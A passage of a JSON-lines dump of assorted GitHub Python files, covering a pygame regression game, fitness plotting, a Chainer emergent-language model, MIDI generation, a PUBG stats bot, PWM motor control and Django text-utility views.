encoding='utf-8') as file:\n file.write(html_text)\n time.sleep(random.randint(1, 4))\n print('========={}/{}========='.format(i, end))\n except (ValueError, requests.RequestException):\n # log the failing id and move on; raise_for_status() raises\n # requests.HTTPError, which a bare ValueError handler would miss\n print('========={} failed========='.format(i))\n error_file_no_list.append(i)\n continue\n\n write_list_to_file(error_file_no_list, save_html_path + '')\n\n\n\n","repo_name":"Rakbow/requests_test","sub_path":"requests_test.py","file_name":"requests_test.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17855881543","text":"\"\"\" APRIL 12, 2021 \"\"\"\n\n\nimport pygame\nimport numpy as np\nfrom setup.settings import Settings\nfrom setup.pygameBasics import PygameBasics\nfrom plot import Plot\nfrom line import FitLine\n\n\nclass Main(PygameBasics):\n def __init__(self):\n pygame.init()\n super().__init__()\n\n self.fitline = FitLine(self.win)\n self.plot = Plot(self.win)\n\n ## Movement flags\n self.moving = False\n self.rotating = False\n self.show_centroid = False\n\n ## Display flags\n self.show_intercepts = False\n\n\n \"\"\" EVENTS \"\"\"\n\n def left_click_events(self):\n pygame.mouse.get_rel()\n self.moving = True\n\n\n def right_click_events(self):\n self.rotating = -2 ## trig degrees are counter-clockwise. negative = clockwise\n\n def mouse_button_up_events(self):\n self.moving = False\n self.rotating = False\n\n def keydown_events(self, event):\n if event.key == pygame.K_a:\n self.rotating = 0.05 ## trig degrees are counter-clockwise. positive = counter clockwise\n\n if event.key == pygame.K_d:\n self.rotating = -0.05 ## trig degrees are counter-clockwise. 
negative = clockwise\n\n if event.key == pygame.K_c:\n self.show_centroid = not self.show_centroid\n\n if event.key == pygame.K_i:\n self.show_intercepts = not self.show_intercepts\n\n if event.key == pygame.K_q:\n pygame.quit(), quit()\n\n\n def keyup_events(self, event):\n self.rotating = False\n\n\n \"\"\" UPDATES \"\"\"\n\n def updates(self):\n self.plot.update(self.show_centroid)\n self.fitline.update(self.moving, self.rotating, self.show_intercepts)\n self.draw()\n\n\n def draw(self):\n self.win.fill(self.set.white)\n self.draw_page_border()\n self.plot.draw()\n self.fitline.draw()\n\n pygame.display.update()\n\n\n \"\"\" MAIN \"\"\"\n\n def main(self):\n while True:\n self.win.fill(self.set.white)\n self.set.clock.tick(self.set.FPS)\n self.events()\n self.updates()\n\nif __name__ == \"__main__\":\n x = Main()\n x.main()\n","repo_name":"Biuku/LinearRegressionGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"17171211890","text":"\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom .plotoptions import COLORS\n\n# define name of index column for convenience\nINDEX = 'Function Evaluations'\n\ncindex = 0\n\ndef _get_fitness_df_means(df, quantiles=30):\n ''' Convert the fitness dataframe to a dataframe of means.\n Split evently between param quantiles.'''\n\n # sort by function evaluation\n df = df.sort_values(INDEX)\n\n # create bins\n df['quantile'] = pd.qcut(df[INDEX], q=quantiles)\n\n # group by the bins\n grouped = df.groupby('quantile')\n\n # find the mean of each bin\n means = grouped.mean()\n\n return means\n\ndef plot_fitness_df(df, label='Fitness', ax=None, quantiles=30):\n\n # get means\n means = _get_fitness_df_means(df, quantiles)\n\n # get color\n global cindex\n try:\n color = COLORS[cindex]\n except IndexError:\n cindex = 0\n color = COLORS[cindex]\n finally:\n cindex += 1\n\n # set plot commands based on input axis\n if ax is None:\n ax = plt\n ax_arg = None\n else:\n ax_arg = ax\n\n # plot\n ax.fill_between(x=means[INDEX], y1=means['90th Percentile'], y2=means['10th Percentile'], color=color, alpha=0.3)\n means.plot(x=INDEX, y='Mean Fitness', c=color, ax=ax_arg, label=label)\n\n # axis settings\n ax.set_title('Fitness Curves')\n ax.set_xlabel('Function Evaluations')\n ax.set_ylabel('Fitness')\n \ndef convergence_stats(df, target, tolerance=0.10, quantiles=30):\n ''' Gets convergence statistics\n Returns (f evals to converge, f evals to get target in population)\n Target value is optimum fitness\n '''\n\n # get means\n means = _get_fitness_df_means(df, quantiles)\n\n def get_first_row_with(condition, df):\n for index, row in df.iterrows():\n if condition(row):\n return index, row\n return None, None # Condition not met on any row in entire DataFrame\n\n def mean_is_optimum(row):\n fitness = row['Mean Fitness']\n top = fitness + fitness * tolerance\n bottom = fitness - fitness * tolerance\n if target < top and target > bottom:\n return True\n else:\n return False\n\n def target_in_population(row):\n perc10 = row['10th Percentile']\n perc90 = row['90th Percentile']\n\n if perc10 < perc90:\n bottom = perc10 - perc10 * tolerance\n top = perc90 + perc90 * tolerance\n else:\n top = perc10 + perc10 * tolerance\n bottom = perc90 - perc90 * tolerance\n \n if target < top and target > bottom:\n return True\n else:\n return False\n\n # find f_eval num when the mean is within 10% 
of the target value\n    _, row = get_first_row_with(mean_is_optimum, means)\n    if row is None:\n        f_evals_to_converge = np.nan\n    else:\n        f_evals_to_converge = row['Function Evaluations']\n\n    # find f_eval num when target value is within population\n    _, row = get_first_row_with(target_in_population, means)\n    if row is None:\n        f_evals_to_get_target_in_pop = np.nan\n    else:\n        f_evals_to_get_target_in_pop = row['Function Evaluations']\n\n    return f_evals_to_converge, f_evals_to_get_target_in_pop\n","repo_name":"nprezant/mlga","sub_path":"mlga/postprocessing/fitness.py","file_name":"fitness.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"16059053004","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : 移动零-双指针.py\n@Time : 2022/4/10\n@Author: Tk \n@Software: PyCharm\n\nInput:\n0,1,0,3,12\nOutput:\n[1,3,12,0,0]\n\"\"\"\nnums = list(map(int, input().split(\",\")))\n\n\nclass Solution:\n    def moveZeroes(self, nums):\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        left, right = 0, 0\n        n = len(nums)\n        while right < n:\n            if nums[right] != 0:\n                nums[left], nums[right] = nums[right], nums[left]\n                left += 1\n            right += 1\n        return nums\n\n\ns = Solution()\nresult = s.moveZeroes(nums)\nprint(result)\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"TOP100/数组/移动零-双指针.py","file_name":"移动零-双指针.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"42614028050","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport argparse\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import training\nfrom chainer.training import extensions\nfrom chainer import reporter\n\nimport numpy as np\n\n\nclass Speaker(chainer.Chain):\n\n def __init__(self, n_in, n_middle, n_units):\n super(Speaker, self).__init__(\n sensor=Sensor(n_in, n_middle),\n\n l1_first=L.Linear(n_middle, n_units),\n l1_next=L.Linear(n_middle * 2, n_units),\n l2_first=L.Linear(n_units, n_units),\n l2_next=L.Linear(n_units, n_units),\n bn1_first=L.BatchNormalization(n_units, use_cudnn=False),\n bn1_next=L.BatchNormalization(n_units, use_cudnn=False),\n bn2_first=L.BatchNormalization(n_units, use_cudnn=False),\n bn2_next=L.BatchNormalization(n_units, use_cudnn=False),\n )\n self.act = F.tanh\n\n def __call__(self, x, z, language, turn, n_word=3, train=True, with_recon=False):\n if with_recon:\n true_image, rec_loss = self.sensor(\n x, true=True, train=train, with_recon=True)\n else:\n true_image = self.sensor(x, true=True, train=train)\n\n if turn == 0:\n h1 = self.act(self.bn1_first(\n self.l1_first(true_image), test=not train))\n thought = self.act(self.bn2_first(\n self.l2_first(h1), test=not train))\n rec_loss_now, rec_loss = 0., 0.\n else:\n if with_recon:\n now_image, rec_loss_now = self.sensor(\n z, true=False, train=train, with_recon=True)\n else:\n now_image = self.sensor(z, true=False, train=train)\n rec_loss_now = 0.\n comparison = F.concat([true_image, now_image], axis=1)\n h1 = self.act(self.bn1_next(\n self.l1_next(comparison), test=not train))\n thought = self.act(self.bn2_next(self.l2_next(h1), test=not train))\n\n sampled_word_idx_seq, total_log_probability = language.decode_thought(\n thought, n_word, turn, train=train)\n\n if with_recon:\n return sampled_word_idx_seq, total_log_probability, rec_loss + rec_loss_now\n else:\n return sampled_word_idx_seq, 
total_log_probability\n\n\nclass Sensor(chainer.Chain):\n\n def __init__(self, n_in, n_units):\n super(Sensor, self).__init__(\n l1=L.Linear(n_in, n_units),\n l2=L.Linear(n_units, n_units),\n l3=L.Linear(n_units, n_units),\n\n rec_l1=L.Linear(n_units, n_units),\n rec_l2=L.Linear(n_units, n_units),\n rec_l3=L.Linear(n_units, n_in),\n )\n self.act = F.relu\n\n def __call__(self, x, true=True, train=True, with_recon=False):\n h1 = self.act(self.l1(x))\n h2 = self.act(self.l2(h1))\n h3 = self.act(self.l3(h2))\n\n if with_recon:\n return h3, self.reconstruct(x, h3, true=true, train=train)\n else:\n return h3\n\n def reconstruct(self, t, h, true=True, train=True):\n h1 = self.act(self.rec_l1(h))\n h2 = self.act(self.rec_l2(h1))\n h3 = self.act(self.rec_l3(h2))\n return F.mean_squared_error(t, h3)\n\n\nclass Language(chainer.Chain):\n\n def __init__(self, n_units, n_vocab):\n super(Language, self).__init__(\n definition=L.EmbedID(n_vocab, n_units),\n expression=L.Linear(n_units, n_vocab, nobias=True),\n interpreter=L.StatefulGRU(n_units, n_units),\n decoder=L.StatefulGRU(n_units, n_units),\n bn_first_interpreter=L.BatchNormalization(\n n_units, use_cudnn=False),\n bn_next_interpreter=L.BatchNormalization(n_units, use_cudnn=False),\n bn_first_expression=L.BatchNormalization(n_vocab, use_cudnn=False),\n bn_next_expression=L.BatchNormalization(n_vocab, use_cudnn=False),\n )\n self.n_vocab = n_vocab\n self.n_units = n_units\n\n self.add_param('eos', (n_units,), dtype='f')\n self.eos.data[:] = 0\n self.add_param('bos', (n_units,), dtype='f')\n self.bos.data[:] = 0\n\n def decode_word(self, x, turn, train=True):\n probability = F.softmax(self.expression(x))\n\n prob_data = probability.data\n if self.xp != np:\n prob_data = self.xp.asnumpy(prob_data)\n batchsize = x.data.shape[0]\n\n if train:\n sampled_ids = np.zeros((batchsize,), np.int32)\n for i_batch, one_prob_data in enumerate(prob_data):\n sampled_ids[i_batch] = np.random.choice(\n self.n_vocab, p=one_prob_data)\n else:\n sampled_ids = np.zeros((batchsize,), np.int32)\n for i_batch, one_prob_data in enumerate(prob_data):\n sampled_ids[i_batch] = np.argmax(\n one_prob_data).astype(np.int32)\n\n if self.xp != np:\n sampled_ids = self.xp.array(sampled_ids)\n sampled_ids = chainer.Variable(sampled_ids, volatile='auto')\n sampled_probability = F.select_item(probability, sampled_ids)\n\n return sampled_ids, sampled_probability\n\n def interpret_word(self, x):\n return self.definition(x)\n\n def interpret_sentence(self, x_seq, turn, train=True):\n self.interpreter.reset_state()\n\n for message_word in x_seq:\n message_meaning = self.interpreter(\n self.interpret_word(message_word))\n\n if turn == 0:\n message_meaning = self.bn_first_interpreter(\n message_meaning, test=not train)\n else:\n message_meaning = self.bn_next_interpreter(\n message_meaning, test=not train)\n\n self.interpreter.reset_state()\n return message_meaning\n\n def decode_thought(self, thought, n_word, turn, train=True):\n sampled_word_idx_seq = []\n total_log_probability = 0.\n if n_word == 1:\n sampled_word_idx, probability = self.decode_word(\n thought, turn, train=train)\n sampled_word_idx_seq.append(sampled_word_idx)\n total_log_probability += F.log(probability)\n else:\n self.decoder.reset_state()\n self.decoder.h = thought\n bos = F.broadcast_to(\n self.bos, (thought.data.shape[0], len(self.bos.data)))\n x_input = bos\n for i in range(n_word):\n h = self.decoder(x_input)\n sampled_word_idx, probability = self.decode_word(\n h, turn, train=train)\n 
sampled_word_idx_seq.append(sampled_word_idx)\n total_log_probability += F.log(probability)\n x_input = self.interpret_word(sampled_word_idx)\n self.decoder.reset_state()\n return sampled_word_idx_seq, total_log_probability\n\n\nclass Listener(chainer.Chain):\n\n def __init__(self, n_in, n_middle, n_units):\n super(Listener, self).__init__(\n sensor=Sensor(n_in, n_middle),\n\n l1_meaning=L.Linear(n_units, n_middle + n_units),\n l1_addnext=L.Linear(n_middle, n_middle + n_units),\n l2=L.Linear(n_middle + n_units, n_middle),\n bn2_first=L.BatchNormalization(n_middle, use_cudnn=False),\n bn2_next=L.BatchNormalization(n_middle, use_cudnn=False),\n l3=L.Linear(n_middle, n_middle),\n l4=L.Linear(n_middle, n_in),\n )\n self.act = F.relu\n\n def __call__(self, canvas, message_sentence, language, turn, train=True, with_recon=False):\n message_meaning = language.interpret_sentence(\n message_sentence, turn, train=train)\n rec_loss = 0.\n if turn == 0:\n h1 = self.act(self.l1_meaning(message_meaning))\n plus_draw = F.tanh(self.l4(self.act(self.l3(self.act(\n self.bn2_first(self.l2(h1), test=not train))))))\n else:\n h1 = self.l1_meaning(message_meaning)\n if with_recon:\n hidden_canvas, rec_loss = self.sensor(\n canvas, true=False, train=train, with_recon=True)\n else:\n hidden_canvas = self.sensor(\n canvas, true=False, train=train, with_recon=False)\n h1 = self.act(h1 + self.l1_addnext(hidden_canvas))\n plus_draw = F.tanh(self.l4(self.act(self.l3(self.act(\n self.bn2_next(self.l2(h1), test=not train))))))\n if with_recon:\n return plus_draw ** 3, rec_loss\n else:\n return plus_draw ** 3\n\n\nclass World(chainer.Chain):\n\n def __init__(self, n_in, n_middle, n_units, n_vocab, n_word, n_turn):\n super(World, self).__init__(\n language=Language(n_units, n_vocab),\n listener=Listener(n_in, n_middle, n_units),\n speaker=Speaker(n_in, n_middle, n_units),\n )\n self.n_turn = n_turn\n self.n_word = n_word\n\n self.baseline_reward = [None for _ in range(10)]\n self.train = True\n\n def __call__(self, image, generate=False):\n n_turn, n_word = self.n_turn, self.n_word\n accum_loss = 0.\n\n sub_accum_loss = 0.\n accum_reward_obj = 0.\n accum_rec_loss = 0.\n\n batchsize = image.data.shape[0]\n sentence_history = []\n log_prob_history = []\n canvas_history = []\n\n # Initialize canvas of Listener\n #canvas = chainer.Variable(self.xp.zeros(image.data.shape, np.float32), volatile='auto')\n canvas = chainer.Variable(self.xp.ones(\n image.data.shape, np.float32), volatile='auto')\n\n loss_list = []\n raw_loss_list = []\n\n for i in range(n_turn):\n\n # Express the image x compared to canvas by Speaker\n sampled_word_idx_seq, log_probability, rec_loss = self.speaker(\n image, canvas, self.language, turn=i, n_word=n_word, with_recon=True, train=self.train)\n accum_rec_loss += rec_loss\n\n # Interpret the expression\n # Paint it into canvas\n plus_draw, rec_loss = self.listener(\n canvas, sampled_word_idx_seq, self.language, turn=i, with_recon=True, train=self.train)\n accum_rec_loss += rec_loss\n\n canvas = canvas + plus_draw\n canvas = F.clip(canvas, 0., 1.) 
* 0.9 + canvas * 0.1\n\n if generate:\n canvas_history.append(F.clip(canvas, 0., 1.).data)\n\n sentence_history.append(sampled_word_idx_seq)\n log_prob_history.append(log_probability)\n\n # Calculate comunication loss\n raw_loss = F.sum((canvas - image) ** 2, axis=1)\n raw_loss_list.append(raw_loss)\n loss = F.sum(raw_loss) / image.data.size\n reporter.report({'l{}'.format(i): loss}, self)\n loss_list.append(loss)\n reporter.report({'p{}'.format(i): self.xp.exp(\n log_probability.data.mean())}, self)\n\n #\"\"\"\n decay = 0.5\n accum_loss_pre_step = sum(\n loss_list[j] * decay ** (n_turn - j - 1) for j in range(n_turn - 1))\n sub_accum_loss += accum_loss_pre_step\n #\"\"\"\n\n accum_loss += loss_list[n_turn - 1]\n\n \"\"\"\n # modification loss\n margin = 0.1\n sub_accum_loss += sum(F.relu(margin + loss_list[i] - loss_list[i-1].data) for i in range(1, n_turn))\n \"\"\"\n\n reward = (1. - raw_loss_list[-1]).data\n #reward = (1.-raw_loss_list[-1])\n\n i = 0\n if self.baseline_reward[i] is None:\n obj = F.sum(sum(log_prob_history) / n_word *\n (reward - 0.)) / reward.size\n else:\n obj = F.sum(sum(log_prob_history) / n_word *\n (reward - self.baseline_reward[i])) / reward.size\n #reward = reward.data\n\n accum_reward_obj += obj\n reporter.report({'nr{}'.format(i): obj}, self)\n\n sub_accum_loss -= accum_reward_obj * 0.00001\n\n if self.train:\n if self.baseline_reward[0] is None:\n self.baseline_reward[0] = (self.xp.sum(reward) / reward.size)\n else:\n self.baseline_reward[0] = 0.95 * self.baseline_reward[0] \\\n + 0.05 * (self.xp.sum(reward) / reward.size)\n\n reporter.report({'loss': accum_loss}, self)\n reporter.report({'reward': accum_reward_obj}, self)\n reporter.report({'reconst': accum_rec_loss}, self)\n sub_accum_loss += accum_rec_loss * 0.01\n\n def orthogonal_regularizer(M):\n MM = F.matmul(M, F.transpose(M))\n iden = self.xp.identity(MM.shape[0])\n norm_loss = F.sum((iden - MM * iden) ** 2)\n return F.sum((MM - MM * iden) ** 2) + norm_loss\n\n \"\"\"\n orthogonal_loss = orthogonal_regularizer(self.language.expression.W) + \\\n # orthogonal_regularizer(self.language.definition.W)\n reporter.report({'ortho': orthogonal_loss}, self)\n sub_accum_loss += 0.001 * orthogonal_loss\n \"\"\"\n\n \"\"\"\n def word_l2(idx):\n definition_l2 = self.language.definition(idx) ** 2\n expression_l2 = F.embed_id(idx, self.language.expression.W) ** 2\n return definition_l2 + expression_l2\n L2norm_used_embed = F.sum(sum([sum([word_l2(i) for i in s])\n for s in sentence_history]))\n sub_accum_loss += 0.0001 * L2norm_used_embed / batchsize\n \"\"\"\n\n reporter.report({'total': accum_loss}, self)\n\n accum_loss += sub_accum_loss\n self.sub_accum_loss = sub_accum_loss.data\n\n if generate:\n return [[i.data for i in s] for s in sentence_history], [lp.data for lp in log_prob_history], canvas_history\n else:\n return accum_loss\n","repo_name":"soskek/emergence_of_language_using_discrete_sequences","sub_path":"scripts/links/communicator.py","file_name":"communicator.py","file_ext":"py","file_size_in_byte":13843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"16127518714","text":"import pretty_midi\nimport json\nimport os\n\ndef json_to_notes_list(json_file):\n with open(json_file, \"r\") as file:\n data = json.load(file)\n # hack because cant figure out the 2x oddity atm\n return data.get('increment', 0.2) / 2.0, data['notes']\n\ndef main():\n generated_path = os.getcwd() + '/midi_generated'\n for file in os.listdir('midi_generated'):\n if 
file.endswith('.json'):\n midi_obj = pretty_midi.PrettyMIDI()\n piano_program = pretty_midi.instrument_name_to_program('Electric Piano 1')\n piano = pretty_midi.Instrument(program=piano_program)\n\n increment, notes_list = json_to_notes_list(generated_path + '/' + file)\n curr_time = 0.0\n curr_notes = {}\n for chord in notes_list:\n ending_notes = curr_notes.keys() - set(chord)\n for note in ending_notes:\n pm_note = pretty_midi.Note(velocity=60, pitch=note, start=curr_notes[note], end=curr_time)\n del curr_notes[note]\n piano.notes.append(pm_note)\n for note in chord:\n if curr_notes.get(note) is None:\n curr_notes[note] = curr_time\n curr_time += increment\n\n midi_obj.instruments.append(piano)\n midi_obj.write(generated_path + '/' + file[:-5] + '.mid')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dmgoodman/MusicGenerator","sub_path":"midi_generator.py","file_name":"midi_generator.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11525646937","text":"import json\nimport requests\nfrom ratelimit import *\nfrom util import dev_print\nfrom private_constants import API_KEY\n\nLABELS_TO_REPORT_TO_USER = ['Wins',\n 'Kills',\n 'Top 10s',\n 'Assists',\n 'K/D Ratio',\n 'Team Kills',\n 'Rounds Played',\n 'Headshot Kills',\n 'Longest Time Survived']\n\nHEADERS = {'content-type': \"application/json\",\n 'trn-api-key': API_KEY}\n\nPUBG_TRACKER = 'https://pubgtracker.com/api/profile/pc/%s'\n\nDEFAULT_PLAYER_STAT_STR = 'Invalid syntax, try: !stats player_name '\n\nfrom base_stats import Statistics\n\nclass PUBGPlayerStatistics(Statistics):\n '''\n Provides printable block of statistics on a given player of PUBG.\n '''\n def __init__(self, player_name, game_mode):\n dev_print('init(): PUBGPlayerStatistics created with %s and %s.' % (player_name, game_mode))\n self.player_name = player_name\n self.game_mode = game_mode\n\n title = '%s (%s)' % (self.player_name.upper(), self.game_mode.upper())\n super(PUBGPlayerStatistics, self).__init__(title, default_str=DEFAULT_PLAYER_STAT_STR, headers=['Stat' , 'Value', 'Percentile'])\n\n @rate_limited(2)\n def get_stats(self):\n\n important_stats = []\n try:\n pubgtracker_page = requests.get(PUBG_TRACKER % self.player_name, headers=HEADERS)\n if pubgtracker_page.status_code != 200:\n self.get_request_failed = 'Request to query URL %s failed with status code %s.\\nIs the game down?' % (PUBG_TRACKER % self.player_name, pubgtracker_page.status_code)\n return\n\n all_player_data = json.loads(pubgtracker_page.text)\n\n # Request returns 200, then informs us there is an error.. 
thanks\n if 'error' in all_player_data:\n self.get_request_failed = 'Pubg Api returned an error: %s' % all_player_data['error']\n return\n\n all_stats = all_player_data['Stats']\n important_stats = [s for s in all_stats if s['Season'] == all_player_data['defaultSeason'] and\n s['Region'] == 'na' and\n s['Match'].lower() == self.game_mode][0]\n except Exception:\n self.list_of_stats = ['N/A', 'N/A', 'N/A']\n\n # other useful stuff is statistics_dict['Match'] / statistics_dict['Stats'] / statistics_dict['Season']\n\n for stat in important_stats['Stats']:\n if stat['label'] in LABELS_TO_REPORT_TO_USER:\n self.list_of_stats.append([stat['label'], stat['displayValue'], stat['percentile']])\n","repo_name":"annapeskin/pubg_discord_bot","sub_path":"player_stats.py","file_name":"player_stats.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17077871585","text":"import time\nfrom machine import Pin, PWM\n\nbuttonPin = 0\nledPin = 25\npwmPin = [2, 3, 4]\nenPin = [6, 7, 8]\n\ndebounceTime = 0.005\nlastDebounceTime = 0\n\nPWMFreq = 100000\nPWMResolution = 16\nMAX_DUTY_CYCLE = 2 ** PWMResolution\nduty = int( 0.4 * MAX_DUTY_CYCLE )\n\nbutton = Pin(buttonPin, Pin.IN, Pin.PULL_UP)\nled = Pin(ledPin, Pin.OUT)\nbuttonState = False\nledState = False\ntransientState = False\nstate = False\nstep = 0\n\npwm = []\nfor i in pwmPin:\n p = PWM(Pin(i))\n p.freq(PWMFreq)\n pwm.append(p)\n \nen = []\nfor i in enPin:\n en.append(Pin(i, Pin.OUT))\n \nen[1].value(1)\nen[0].value(1)\npwm[0].duty_u16(duty)\n\nwhile True:\n buttonState = button.value()\n \n if(state != transientState):\n #print(\"Transient state\")\n lastDebounceTime = time.time()\n transientState = state\n \n if((time.time() - lastDebounceTime) > debounceTime):\n if(state == True and buttonState == False):\n #print(\"Button pressed\")\n #ledState = not ledState\n #led.value(ledState)\n print(\"Step \" + str(step))\n \n if step == 0:\n en[2].value(0)\n pwm[2].duty_u16(0)\n \n en[0].value(1)\n pwm[0].duty_u16(duty)\n \n elif step == 1:\n en[1].value(0)\n \n en[2].value(1)\n \n elif step == 2:\n en[0].value(0)\n pwm[0].duty_u16(0)\n \n en[1].value(1)\n pwm[1].duty_u16(duty)\n \n elif step == 3:\n en[2].value(0)\n \n en[0].value(1)\n \n elif step == 4:\n en[1].value(0)\n pwm[1].duty_u16(0)\n \n en[2].value(1)\n pwm[2].duty_u16(duty)\n \n else:\n en[0].value(0)\n en[1].value(1)\n \n step += 1\n step %= 6\n \n #elif(state == False and buttonState == True):\n # print(\"Button released\")\n \n \n state = buttonState","repo_name":"cendanaf/pwm","sub_path":"6543.py","file_name":"6543.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32755156612","text":"import torch\nimport random\nfrom typing import Tuple, List\nimport gensim\nimport logging\nimport pickle\ndef batcher(sents, sorted_indices, batch_size, viterbi=False):\n if viterbi:\n viterbi_scaler = 8\n else:\n viterbi_scaler = 8\n cur_len = len(sents[sorted_indices[0]])\n # cur_batch_size = cur_len * 20\n cur_batch_size = batch_size\n cur_batch = []\n cur_indices = []\n batches = []\n batch_indices = []\n for index in sorted_indices:\n\n if len(sents[index]) != cur_len or len(cur_batch) == cur_batch_size:\n\n batches.append(torch.tensor(cur_batch).to('cuda'))\n batch_indices.append(cur_indices)\n cur_batch = []\n cur_indices = []\n cur_len = len(sents[index])\n\n if cur_len <= 10:\n cur_batch_size = 
batch_size * 120 // viterbi_scaler\n elif cur_len > 10 and cur_len <= 20:\n cur_batch_size = batch_size * 48 // viterbi_scaler\n elif cur_len > 20 and cur_len <= 30:\n cur_batch_size = batch_size * 16 // viterbi_scaler\n elif cur_len > 30 and cur_len <= 40:\n cur_batch_size = batch_size * 8 // viterbi_scaler\n elif cur_len > 40 and cur_len <= 60:\n cur_batch_size = batch_size\n elif cur_len >= 60:\n cur_batch_size = 1\n\n cur_batch.append(sents[index])\n cur_indices.append(index)\n else:\n if cur_batch:\n batches.append(torch.tensor(cur_batch).to('cuda'))\n batch_indices.append(cur_indices)\n\n logging.info( \"Batcher produces {} number of sentences with {} originals\".format(sum([len(x) for x in batches]),\n len(sents)))\n return list(zip(batches, batch_indices))\n\ndef compile_embeddings(word_vecs_file, word_dict, punct_dict, embedding_type='word'):\n\n if word_vecs_file is None:\n return None\n else:\n try:\n if word_vecs_file.endswith('pc') or word_vecs_file.endswith('pkl'):\n with open(word_vecs_file, 'rb') as efh:\n word_vecs = pickle.load(efh)\n else:\n word_vecs = torch.load(word_vecs_file)\n keys = word_vecs\n except:\n word_vecs = gensim.models.KeyedVectors.load(word_vecs_file)\n keys = word_vecs.vocab.keys()\n if embedding_type == 'word':\n lower_word_vecs = {}\n for key in keys:\n word = key.lower()\n if word == '-lrb-' or word == '-rrb-' or word == '-lcb-' or word == '-rcb-':\n word = word.replace('-', '')\n elif word == '#':\n word = '-pound-'\n if word in word_vecs and word != key:\n continue\n elif word not in word_vecs:\n lower_word_vecs[word] = torch.tensor(word_vecs[key])\n elif word == key:\n lower_word_vecs[word] = torch.tensor(word_vecs[key])\n useful_vecs = []\n for i in range(len(word_dict)):\n word = word_dict[i]\n if word not in lower_word_vecs and 'PUNCT' in word:\n word = punct_dict[word]\n word = word.lower()\n assert word in lower_word_vecs, \"{} not in word vecs\".format(word)\n useful_vecs.append(lower_word_vecs[word])\n embeddings = torch.stack(useful_vecs, dim=0).float()\n logging.info('Embedding shapes: {}'.format(str(embeddings.shape)))\n elif embedding_type == 'context':\n return word_vecs\n return embeddings\n","repo_name":"lifengjin/acl_flow","sub_path":"scripts/batcher.py","file_name":"batcher.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"35296528736","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\n\ndef index(request):\n return render(request, 'index.html')\n # return HttpResponse(\"hello
World
\")\n\n\ndef about(request):\n return HttpResponse(\"about page\")\n\n\ndef removeLine(userInput):\n refined_text = \"\"\n for char in userInput:\n if char!= '\\n' and char!='\\r':\n refined_text += char\n return refined_text\n\ndef removePunc(userInput):\n punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n refined_text = str()\n for ele in userInput:\n if ele not in punc:\n refined_text = refined_text + ele\n return refined_text\n\ndef removeExtraSpace(userInput):\n tempText = str()\n for x in range(len(userInput)):\n if not (userInput[x] == ' ' and userInput[x+1] == ' '):\n tempText += userInput[x]\n return tempText\n\ndef analyser(request):\n # boxtext = request.GET.get('box','default')\n # check_box = request.GET.get('check','off')\n # capitalise = request.GET.get('capitalise','off')\n # charcounter = request.GET.get('charcounter','off')\n # count = 0\n # if check_box == 'on' and capitalise == 'on':\n # refined_text = str()\n # # punctuation remover\n # punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n # for ele in boxtext:\n # if ele not in punc:\n # refined_text = refined_text + ele\n # params = {'boxtext':boxtext, 'refined_text':refined_text, 'capitalised_text': boxtext.upper()}\n # return render(request,'analyser.html',params)\n # if charcounter == 'on':\n # for x in boxtext:\n # count+=1\n # params = {'boxtext':boxtext,'count':count}\n # return render(request,'analyser.html',params)\n # else:\n # return HttpResponse(\"Checkbox not selected\")\n textareaText = request.POST.get('box', 'default')\n # print(textareaTextList)\n # textareaText = str()\n # print(textareaText)\n # for x in textareaTextList:\n # textareaText = textareaText + \"\\n\" + x\n # print(textareaText)\n # print(len(textareaText))\n removePunctuation = request.POST.get('removePunc','off')\n capitalise = request.POST.get('capitalise', 'off')\n lineRemover = request.POST.get('lineRemover', 'off')\n extraSpaceRemover = request.POST.get('extraSpaceRemover', 'off')\n print(lineRemover)\n refinedText = str()\n if removePunctuation == 'on':\n refinedText = removePunc(textareaText)\n if capitalise == 'on':\n refinedText = refinedText.upper()\n if lineRemover == 'on':\n refinedText = removeLine(refinedText)\n if extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(refinedText)\n elif capitalise == 'on':\n refinedText = textareaText.upper()\n if lineRemover == 'on':\n refinedText = removeLine(refinedText)\n if extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(refinedText)\n elif lineRemover == 'on':\n refinedText = removeLine(textareaText)\n print(textareaText.index('\\n'))\n if extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(refinedText)\n elif extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(textareaText)\n else:\n refinedText = textareaText\n\n params = {'''userInput''': textareaText , 'refinedText':refinedText}\n return render(request, 'analyser.html', params)\n\ndef file(request):\n f = open(\"textutils/one.txt\", \"r\")\n return HttpResponse(f.read())\n\ndef charCounter(request):\n return render(request, 'charcounter.html')\n\n\ndef navigator(request):\n return HttpResponse('''\n
